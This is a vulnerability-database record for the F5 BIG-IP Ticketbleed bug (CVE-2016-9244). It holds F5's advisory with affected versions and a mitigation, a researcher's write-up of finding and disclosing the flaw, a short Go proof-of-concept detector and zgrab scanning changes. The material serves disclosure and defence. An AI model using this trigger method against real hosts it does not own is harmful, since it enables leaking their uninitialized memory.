"cpe:2.3:a:f5:big-ip_access_policy_manager:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:11.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:11.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:11.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:11.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_protocol_security_module:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:11.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:11.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_protocol_security_module:11.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:12.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:11.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:11.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:12.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:11.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:11.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:11.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:11.5.3:*:*:*:*:*:*:*", 
"cpe:2.3:a:f5:big-ip_advanced_firewall_manager:11.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:11.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:11.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:11.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:11.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:11.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:11.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:11.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:11.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:11.4.0:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2019-04-30T18:21:17", "bulletinFamily": "software", "cvelist": ["CVE-2016-9244"], "description": "\nF5 Product Development has assigned ID 596340 (BIG-IP) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H638510 on the **Diagnostics** > **Identified** > **High** screen. 
\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.2 HF1 \n11.6.1 HF2 \n11.5.4 HF3 \n11.2.1| High| BIG-IP virtual server* \nBIG-IP AAM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.2 HF1 \n11.6.1 HF2 \n11.5.4 HF3| High| BIG-IP virtual server* \nBIG-IP AFM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.2 HF1 \n11.6.1 HF2 \n11.5.4 HF3| High| BIG-IP virtual server* \nBIG-IP Analytics| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.2 HF1 \n11.6.1 HF2 \n11.5.4 HF3 \n11.2.1| High| BIG-IP virtual server* \nBIG-IP APM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.2 HF1 \n11.6.1 HF2 \n11.5.4 HF3 \n11.2.1| High| BIG-IP virtual server* \nBIG-IP ASM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.2 HF1 \n11.6.1 HF2 \n11.5.4 HF3 \n11.2.1| High| BIG-IP virtual server* \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None \n| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.2 HF1 \n11.6.1 HF2 \n11.5.4 HF3 \n11.2.1| High| BIG-IP virtual server* \nBIG-IP PEM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.2 HF1 \n11.6.1 HF2 \n11.5.4 HF3| High| BIG-IP virtual server* \nBIG-IP PSM| 11.4.0 - 11.4.1| None| High| BIG-IP virtual server* \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable | None \nBIG-IP WebSafe| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable \n\n| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable | None \nEnterprise Manager| None| 3.1.1| Not vulnerable | None \nBIG-IQ Cloud| None| 4.0.0 - 
4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None \n \n* The BIG-IP virtual server is associated with the Client SSL profile that has the Session Ticket option enabled.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, you can disable the Session Ticket option on the affected Client SSL profile. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **Local Traffic** >** Profiles **> **SSL** > **Client**.\n 3. For the **Configuration **option, select **Advanced**.\n 4. Clear the **Session Ticket** check box.\n 5. 
Click **Update**.\n\nF5 would like to acknowledge Cloudflare Cryptography Engineer Filippo Valsorda for bringing this issue to our attention and for following the highest standards of responsible disclosure.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n", "edition": 1, "modified": "2017-05-12T19:58:00", "published": "2017-02-09T04:23:00", "id": "F5:K05121675", "href": "https://support.f5.com/csp/article/K05121675", "title": "F5 TLS vulnerability CVE-2016-9244", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "seebug": [{"lastseen": "2017-11-19T12:01:31", "description": "Ticketbleed (CVE-2016-9244) is a software vulnerability in the TLS stack of certain F5 products that allows a remote attacker to extract up to 31 bytes of uninitialized memory at a time, which can contain any kind of random sensitive information, like in Heartbleed.\r\n\r\nIf you suspect you might be affected by this vulnerability, you can find details and mitigation instructions at [ticketbleed.com](https://ticketbleed.com) (including an online test) or in the [F5 K05121675 article](https://support.f5.com/csp/article/K05121675).\r\n\r\n\r\n\r\nIn this post we'll talk about how Ticketbleed was found, verified and reported.\r\n\r\n## JIRA RG-XXX\r\n\r\nIt all started 
with a bug report from a customer using Cloudflare [Railgun](https://www.cloudflare.com/website-optimization/railgun/).\r\n\r\n> **rg-listener <> origin requests fail with \"local error: unexpected message\"**\r\n> \r\n> A PCAP of the rg-listener <> origin traffic is attached and shows a TLS alert being triggered during the handshake.\r\n> \r\n> Worth noting the customer is using an F5 Load Balancer in front of the Railgun and the Origin Web Server: `visitor > edge > cache > rg-sender > F5 > rg-listener > F5 > origin web server`\r\n> \r\n> Matthew was unable to replicate by using a basic TLS.Dial in Go so this seems tricky so far.\r\n\r\nA bit of context on Railgun: Railgun speeds up requests between the Cloudflare edge and the origin web site by establishing a permanent optimized connection and performing delta compression on HTTP responses.\r\n\r\n\r\n\r\nThe Railgun connection uses a custom binary protocol over TLS, and the two endpoints are Go programs: one on the Cloudflare edge and one installed on the customer servers. This means that the whole connection goes through the Go TLS stack, crypto/tls.\r\n\r\nThat connection failing with `local error: unexpected message` means that the customer\u2019s side of the connection sent something that confused the Go TLS stack of the Railgun running on our side. Since the customer is running an F5 load balancer between their Railgun and ours, this points towards an **incompatibility between the Go TLS stack and the F5 one**.\r\n\r\nHowever, when my colleague Matthew tried to reproduce the issue by connecting to the load balancer with a simple Go `crypto/tls.Dial`, it succeeded.\r\n\r\n## PCAP diving\r\n\r\nSince Matthew sits at a desk opposite of mine in the Cloudflare London office, he knew I've been working with the Go TLS stack for our TLS 1.3 implementation. We quickly ended up in a joint debugging session.\r\n\r\nHere's the PCAP we were staring at.\r\n\r\n\r\n\r\n\r\n\r\n\r\nSo, there's the ClientHello, right. 
The ServerHello, so far so good. And then immediately a ChangeCipherSpec. Oh. Ok.\r\n\r\nA ChangeCipherSpec is how TLS 1.2 says \"let's switch to encrypted\". The only way a ChangeCipherSpec can come this early in a 1.2 handshake, is if session resumption happened.\r\n\r\nAnd indeed, by focusing on the ClientHello we can see that the Railgun client sent a Session Ticket.\r\n\r\n\r\n\r\nA Session Ticket carries some encrypted key material from a previous session to allow the server to resume that previous session immediately instead of negotiating a new one.\r\n\r\n\r\n\r\n\r\n_To learn more about session resumption in TLS 1.2, watch the first part of [the Cloudflare Crypto Team TLS 1.3 talk](https://blog.cloudflare.com/tls-1-3-explained-by-the-cloudflare-crypto-team-at-33c3/), [read the transcript](https://blog.cloudflare.com/tls-1-3-overview-and-q-and-a/), or the [\"TLS Session Resumption\" post](https://blog.cloudflare.com/tls-session-resumption-full-speed-and-secure/) on the Cloudflare blog._\r\n\r\nAfter that ChangeCipherSpec both Railgun and Wireshark get pretty confused (HelloVerifyRequest? Umh?). So we have reason to believe the issue is related to Session Tickets.\r\n\r\nIn Go you have to explicitly enable Session Tickets on the client side by setting a `ClientSessionCache`. 
We verified that indeed Railgun uses this functionality and wrote this small test:\r\n\r\n```\r\npackage main\r\n\r\nimport ( \r\n \"crypto/tls\"\r\n)\r\n\r\nfunc main() { \r\n conf := &tls.Config{\r\n InsecureSkipVerify: true,\r\n ClientSessionCache: tls.NewLRUClientSessionCache(32),\r\n }\r\n\r\n conn, err := tls.Dial(\"tcp\", \"redacted:443\", conf)\r\n if err != nil {\r\n panic(\"failed to connect: \" + err.Error())\r\n }\r\n conn.Close()\r\n\r\n conn, err = tls.Dial(\"tcp\", \"redacted:443\", conf)\r\n if err != nil {\r\n panic(\"failed to resume: \" + err.Error())\r\n }\r\n conn.Close()\r\n}\r\n\r\n```\r\n\r\nAnd sure enough, `local error: unexpected message`.\r\n\r\n## crypto/tls diving\r\n\r\nOnce I had it reproduced in a local `crypto/tls` it became a home game. `crypto/tls` error messages tend to be short of details, but a quick tweak allows us to pinpoint where they are generated.\r\n\r\nEvery time a fatal error occurs, `setErrorLocked` is called to record the error and make sure that all following operations fail. 
That function is usually called from the site of the error.\r\n\r\nA well placed `panic(err)` will drop a stack trace that should show us _what_ message is unexpected.\r\n\r\n```\r\ndiff --git a/src/crypto/tls/conn.go b/src/crypto/tls/conn.go \r\nindex 77fd6d3254..017350976a 100644 \r\n--- a/src/crypto/tls/conn.go\r\n+++ b/src/crypto/tls/conn.go\r\n@@ -150,8 +150,7 @@ type halfConn struct {\r\n }\r\n\r\n func (hc *halfConn) setErrorLocked(err error) error {\r\n- hc.err = err\r\n- return err\r\n+ panic(err)\r\n }\r\n\r\n // prepareCipherSpec sets the encryption and MAC states\r\n\r\n```\r\n\r\n```\r\npanic: local error: tls: unexpected message\r\n\r\ngoroutine 1 [running]: \r\npanic(0x185340, 0xc42006fae0) \r\n /Users/filippo/code/go/src/runtime/panic.go:500 +0x1a1\r\ncrypto/tls.(*halfConn).setErrorLocked(0xc42007da38, 0x25e6e0, 0xc42006fae0, 0x25eee0, 0xc4200c0af0) \r\n /Users/filippo/code/go/src/crypto/tls/conn.go:153 +0x4d\r\ncrypto/tls.(*Conn).sendAlertLocked(0xc42007d880, 0x1c390a, 0xc42007da38, 0x2d) \r\n /Users/filippo/code/go/src/crypto/tls/conn.go:719 +0x147\r\ncrypto/tls.(*Conn).sendAlert(0xc42007d880, 0xc42007990a, 0x0, 0x0) \r\n /Users/filippo/code/go/src/crypto/tls/conn.go:727 +0x8c\r\ncrypto/tls.(*Conn).readRecord(0xc42007d880, 0xc400000016, 0x0, 0x0) \r\n /Users/filippo/code/go/src/crypto/tls/conn.go:672 +0x719\r\ncrypto/tls.(*Conn).readHandshake(0xc42007d880, 0xe7a37, 0xc42006c3f0, 0x1030e, 0x0) \r\n /Users/filippo/code/go/src/crypto/tls/conn.go:928 +0x8f\r\ncrypto/tls.(*clientHandshakeState).doFullHandshake(0xc4200b7c10, 0xc420070480, 0x55) \r\n /Users/filippo/code/go/src/crypto/tls/handshake_client.go:262 +0x8c\r\ncrypto/tls.(*Conn).clientHandshake(0xc42007d880, 0x1c3928, 0xc42007d988) \r\n /Users/filippo/code/go/src/crypto/tls/handshake_client.go:228 +0xfd1\r\ncrypto/tls.(*Conn).Handshake(0xc42007d880, 0x0, 0x0) \r\n /Users/filippo/code/go/src/crypto/tls/conn.go:1259 +0x1b8\r\ncrypto/tls.DialWithDialer(0xc4200b7e40, 0x1ad310, 0x3, 0x1af02b, 0xf, 
0xc420092580, 0x4ff80, 0xc420072000, 0xc42007d118) \r\n /Users/filippo/code/go/src/crypto/tls/tls.go:146 +0x1f8\r\ncrypto/tls.Dial(0x1ad310, 0x3, 0x1af02b, 0xf, 0xc420092580, 0xc42007ce00, 0x0, 0x0) \r\n /Users/filippo/code/go/src/crypto/tls/tls.go:170 +0x9d\r\n\r\n```\r\n\r\nSweet, let's see where the unexpected message alert is sent, at `conn.go:672`.\r\n\r\n```\r\n 670 case recordTypeChangeCipherSpec:\r\n 671 if typ != want || len(data) != 1 || data[0] != 1 {\r\n 672 c.in.setErrorLocked(c.sendAlert(alertUnexpectedMessage))\r\n 673 break\r\n 674 }\r\n 675 err := c.in.changeCipherSpec()\r\n 676 if err != nil {\r\n 677 c.in.setErrorLocked(c.sendAlert(err.(alert)))\r\n 678 }\r\n\r\n```\r\n\r\nSo the message we didn't expect is the ChangeCipherSpec. Let's see if the higher stack frames give us an indication as to what we expected instead. Let's chase `handshake_client.go:262`.\r\n\r\n```\r\n 259 func (hs *clientHandshakeState) doFullHandshake() error {\r\n 260 c := hs.c\r\n 261\r\n 262 msg, err := c.readHandshake()\r\n 263 if err != nil {\r\n 264 return err\r\n 265 }\r\n\r\n```\r\n\r\nAh, `doFullHandshake`. Wait. The server here is clearly doing a resumption (sending a Change Cipher Spec immediately after the Server Hello), while the client... tries to do a full handshake?\r\n\r\nIt looks like the client offers a Session Ticket, the server _accepts it_, but the client _doesn't realize and carries on_.\r\n\r\n## RFC diving\r\n\r\nAt this point I had to fill a gap in my TLS 1.2 knowledge. How does a server signal acceptance of a Session Ticket?\r\n\r\n[RFC 5077](https://tools.ietf.org/html/rfc5077), which obsoletes RFC 4507, says:\r\n\r\n> When presenting a ticket, the client MAY generate and include a Session ID in the TLS ClientHello. 
If the server accepts the ticket and the Session ID is not empty, then it MUST respond with the same Session ID present in the ClientHello.\r\n\r\nSo a client that doesn't want to guess whether a Session Ticket is accepted or not will send a Session ID and look for it to be echoed back by the server.\r\n\r\nThe code in `crypto/tls`, clear as always, does exactly that.\r\n\r\n```\r\nfunc (hs *clientHandshakeState) serverResumedSession() bool { \r\n // If the server responded with the same sessionId then it means the\r\n // sessionTicket is being used to resume a TLS session.\r\n return hs.session != nil && hs.hello.sessionId != nil &&\r\n bytes.Equal(hs.serverHello.sessionId, hs.hello.sessionId)\r\n}\r\n\r\n```\r\n\r\n## Session IDs diving\r\n\r\nSomething must be going wrong there. Let's practice some healthy print-based debugging.\r\n\r\n```\r\ndiff --git a/src/crypto/tls/handshake_client.go b/src/crypto/tls/handshake_client.go \r\nindex f789e6f888..2868802d82 100644 \r\n--- a/src/crypto/tls/handshake_client.go\r\n+++ b/src/crypto/tls/handshake_client.go\r\n@@ -552,6 +552,8 @@ func (hs *clientHandshakeState) establishKeys() error {\r\n func (hs *clientHandshakeState) serverResumedSession() bool {\r\n // If the server responded with the same sessionId then it means the\r\n // sessionTicket is being used to resume a TLS session.\r\n+ println(hex.Dump(hs.hello.sessionId))\r\n+ println(hex.Dump(hs.serverHello.sessionId))\r\n return hs.session != nil && hs.hello.sessionId != nil &&\r\n bytes.Equal(hs.serverHello.sessionId, hs.hello.sessionId)\r\n }\r\n\r\n```\r\n\r\n```\r\n00000000 a8 73 2f c4 c9 80 e2 ef b8 e0 b7 da cf 0d 71 e5 |.s/...........q.|\r\n\r\n00000000 a8 73 2f c4 c9 80 e2 ef b8 e0 b7 da cf 0d 71 e5 |.s/...........q.| \r\n00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| \r\n\r\n```\r\n\r\nAh. The F5 server is padding the Session ID to its maximum length of 32 bytes, instead of returning it as the client sent it. 
crypto/tls in Go uses 16 byte Session IDs.\r\n\r\nFrom there the failure mode is clear: the server thinks it told the client to use the ticket, the client thinks the server started a new session, and things get unexpected.\r\n\r\nIn the TLS space we have seen quite some incompatibilities like this. Notoriously, ClientHellos have to be either shorter than 256 bytes or longer than 512 [not to clash with some server implementations](https://bugs.chromium.org/p/chromium/issues/detail?id=315828).\r\n\r\nI was about to write this up as just another real world TLS quirk when...\r\n\r\n```\r\n00000000 79 bd e5 a8 77 55 8b 92 41 e9 89 45 e1 50 31 25 |y...wU..A..E.P1%|\r\n\r\n00000000 79 bd e5 a8 77 55 8b 92 41 e9 89 45 e1 50 31 25 |y...wU..A..E.P1%| \r\n00000010 04 27 a8 4f 63 22 de 8b ef f9 a3 13 dd 66 5c ee |.'.Oc\".......f\\.| \r\n\r\n```\r\n\r\nUh oh. Wait. Those are not zeroes. That's not padding. That's... memory?\r\n\r\nAt this point the impression of dealing with a Heartbleed-like vulnerability got pretty clear. The server is allocating a buffer as big as the client's Session ID, and then sending back always 32 bytes, bringing along whatever unallocated memory was in the extra bytes.\r\n\r\n## Browser diving\r\n\r\nI had one last source of skepticism: how could this not have been noticed before?\r\n\r\nThe answer is banal: all browsers use 32-byte Session IDs to negotiate Session Tickets. Together with Nick Sullivan I checked NSS, OpenSSL and BoringSSL to confirm. [Here's BoringSSL for example](https://github.com/google/boringssl/blob/33fe4a0d1406f423e7424ea7367e1d1a51c2edc1/ssl/handshake_client.c#L1901-L1908).\r\n\r\n```\r\n /* Generate a session ID for this session based on the session ticket. We use\r\n * the session ID mechanism for detecting ticket resumption. 
This also fits in\r\n * with assumptions elsewhere in OpenSSL.*/\r\n if (!EVP_Digest(CBS_data(&ticket), CBS_len(&ticket),\r\n session->session_id, &session->session_id_length,\r\n EVP_sha256(), NULL)) {\r\n goto err;\r\n }\r\n\r\n```\r\n\r\nBoringSSL uses a SHA256 hash of the Session Ticket, which is exactly 32 bytes.\r\n\r\n(Interestingly, from speaking to people in the TLS field, there was an idle intention to switch to 1-byte Session IDs but no one had tested it widely yet.)\r\n\r\nAs for Go, it\u2019s probably the case that client-side Session Tickets are not enabled that often.\r\n\r\n## Disclosure diving\r\n\r\nAfter realizing the security implications of this issue we compartmentalized it inside the company, made sure our Support team would advise our customer to simply disable Session Tickets, and sought to contact F5.\r\n\r\nAfter a couple misdirected emails that were met by requests for Serial Numbers, we got in contact with the F5 SIRT, exchanged PGP keys, and provided a report and a PoC.\r\n\r\nThe report was escalated to the development team, and confirmed to be an uninitialized memory disclosure limited to the Session Ticket functionality.\r\n\r\nIt's unclear what data might be exfiltrated via this vulnerability, but Heartbleed and the [Cloudflare Heartbleed Challenge](https://blog.cloudflare.com/the-results-of-the-cloudflare-challenge/) taught us not to make assumptions of safety with uninitialized memory.\r\n\r\nIn planning a timeline, the F5 team was faced with a rigid release schedule. 
Considering multiple factors, including the availability of an effective mitigation (disabling Session Tickets) and the apparent triviality of the vulnerability, I decided to adhere to the [industry-standard disclosure policy adopted by Google's Project Zero](https://googleprojectzero.blogspot.co.uk/2015/02/feedback-and-data-driven-updates-to.html): 90 days with 15 days of grace period if a fix is due to be released.\r\n\r\nBy coincidence today coincides with both the expiration of those terms and the scheduled release of the first hotfix for one of the affected versions.\r\n\r\nI'd like to thank the F5 SIRT for their professionalism, transparency and collaboration, which were in pleasant contrast with the stories of adversarial behavior we hear too often in the industry.\r\n\r\nThe issue was assigned CVE-2016-9244.\r\n\r\n## Internet diving\r\n\r\nWhen we reported the issue to F5 I had tested the vulnerability against a single host, which quickly became unavailable after disabling Session Tickets. That meant having both low confidence in the extent of the vulnerability, and no way to reproduce it.\r\n\r\nThis was the perfect occasion to perform an Internet scan. 
I picked the toolkit that powers Censys.io by the University of Michigan: zmap and zgrab.\r\n\r\nzmap is an IPv4-space scanning tool that detects open ports, while zgrab is a Go tool that follows up by connecting to those ports and collecting a number of protocol details.\r\n\r\nI added support for Session Ticket resumption to zgrab, and then wrote a simple Ticketbleed detector by having zgrab send a 31-byte Session ID, and comparing it with the one returned by the server.\r\n\r\n```\r\ndiff --git a/ztools/ztls/handshake_client.go b/ztools/ztls/handshake_client.go \r\nindex e6c506b..af098d3 100644 \r\n--- a/ztools/ztls/handshake_client.go\r\n+++ b/ztools/ztls/handshake_client.go\r\n@@ -161,7 +161,7 @@ func (c *Conn) clientHandshake() error {\r\n session, sessionCache = nil, nil\r\n hello.ticketSupported = true\r\n hello.sessionTicket = []byte(c.config.FixedSessionTicket)\r\n- hello.sessionId = make([]byte, 32)\r\n+ hello.sessionId = make([]byte, 32-1)\r\n if _, err := io.ReadFull(c.config.rand(), hello.sessionId); err != nil {\r\n c.sendAlert(alertInternalError)\r\n return errors.New(\"tls: short read from Rand: \" + err.Error())\r\n@@ -658,8 +658,11 @@ func (hs *clientHandshakeState) processServerHello() (bool, error) {\r\n\r\n if c.config.FixedSessionTicket != nil {\r\n c.resumption = &Resumption{\r\n- Accepted: hs.hello.sessionId != nil && bytes.Equal(hs.serverHello.sessionId, hs.hello.sessionId),\r\n- SessionID: hs.serverHello.sessionId,\r\n+ Accepted: hs.hello.sessionId != nil && bytes.Equal(hs.serverHello.sessionId, hs.hello.sessionId),\r\n+ TicketBleed: len(hs.serverHello.sessionId) > len(hs.hello.sessionId) &&\r\n+ bytes.Equal(hs.serverHello.sessionId[:len(hs.hello.sessionId)], hs.hello.sessionId),\r\n+ ServerSessionID: hs.serverHello.sessionId,\r\n+ ClientSessionID: hs.hello.sessionId,\r\n }\r\n return false, FixedSessionTicketError\r\n }\r\n\r\n```\r\n\r\nBy picking 31 bytes I ensured the sensitive information leakage would be negligible.\r\n\r\nI then 
downloaded the latest zgrab results from the Censys website, which thankfully included information on what hosts supported Session Tickets, and completed the pipeline with abundant doses of `pv` and `jq`.\r\n\r\nAfter getting two hits in the first 1,000 hosts from the Alexa top 1m list in November, I interrupted the scan to avoid leaking the vulnerability and postponed to a date closer to the disclosure.\r\n\r\nWhile producing this writeup I completed the scan, and found between 0.1% and 0.2% of all hosts to be vulnerable, or 0.4% of the websites supporting Session Tickets.\r\n\r\n## Read more\r\n\r\nFor more details visit the [F5 K05121675 article](https://support.f5.com/csp/article/K05121675) or [ticketbleed.com](https://ticketbleed.com), where you'll find a technical summary, affected versions, mitigation instructions, a complete timeline, scan results, IPs of the scanning machines, and an online test.\r\n\r\nOtherwise, you might want to [follow me on Twitter](https://twitter.com/FiloSottile).", "published": "2017-02-10T00:00:00", "type": "seebug", "title": "F5 TLS vulnerability (CVE-2016-9244)\n (Ticketbleed)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-9244"], "modified": "2017-02-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92673", "id": "SSV:92673", "sourceData": "\n package main\r\n\r\nimport (\r\n\t\"crypto/tls\"\r\n\t\"fmt\"\r\n\t\"log\"\r\n\t\"strings\"\r\n)\r\n\r\nvar Target = \"example.com:443\"\r\n\r\nfunc main() {\r\n\tconf := &tls.Config{\r\n\t\tInsecureSkipVerify: true,\r\n\t\tClientSessionCache: tls.NewLRUClientSessionCache(32),\r\n\t}\r\n\r\n\tconn, err := tls.Dial(\"tcp\", Target, conf)\r\n\tif err != nil {\r\n\t\tlog.Fatalln(\"Failed to connect:\", err)\r\n\t}\r\n\tconn.Close()\r\n\r\n\tconn, err = tls.Dial(\"tcp\", Target, conf)\r\n\tif err != nil && strings.Contains(err.Error(), \"unexpected message\") {\r\n\t\tfmt.Println(Target, \"is vulnerable to Ticketbleed\")\r\n\t} else if err != nil {\r\n\t\tlog.Fatalln(\"Failed to 
reconnect:\", err)\r\n\t} else {\r\n\t\tfmt.Println(Target, \"does NOT appear to be vulnerable\")\r\n\t\tconn.Close()\r\n\t}\r\n}\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92673"}], "openvas": [{"lastseen": "2020-04-07T18:28:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9244"], "description": "A BIG-IP SSL virtual server with the non-default Session Tickets option\n enabled may leak up to 31 bytes of uninitialized memory.", "modified": "2020-04-03T00:00:00", "published": "2017-02-09T00:00:00", "id": "OPENVAS:1361412562310140155", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140155", "type": "openvas", "title": "F5 BIG-IP - F5 TLS vulnerability CVE-2016-9244", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - F5 TLS vulnerability CVE-2016-9244\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
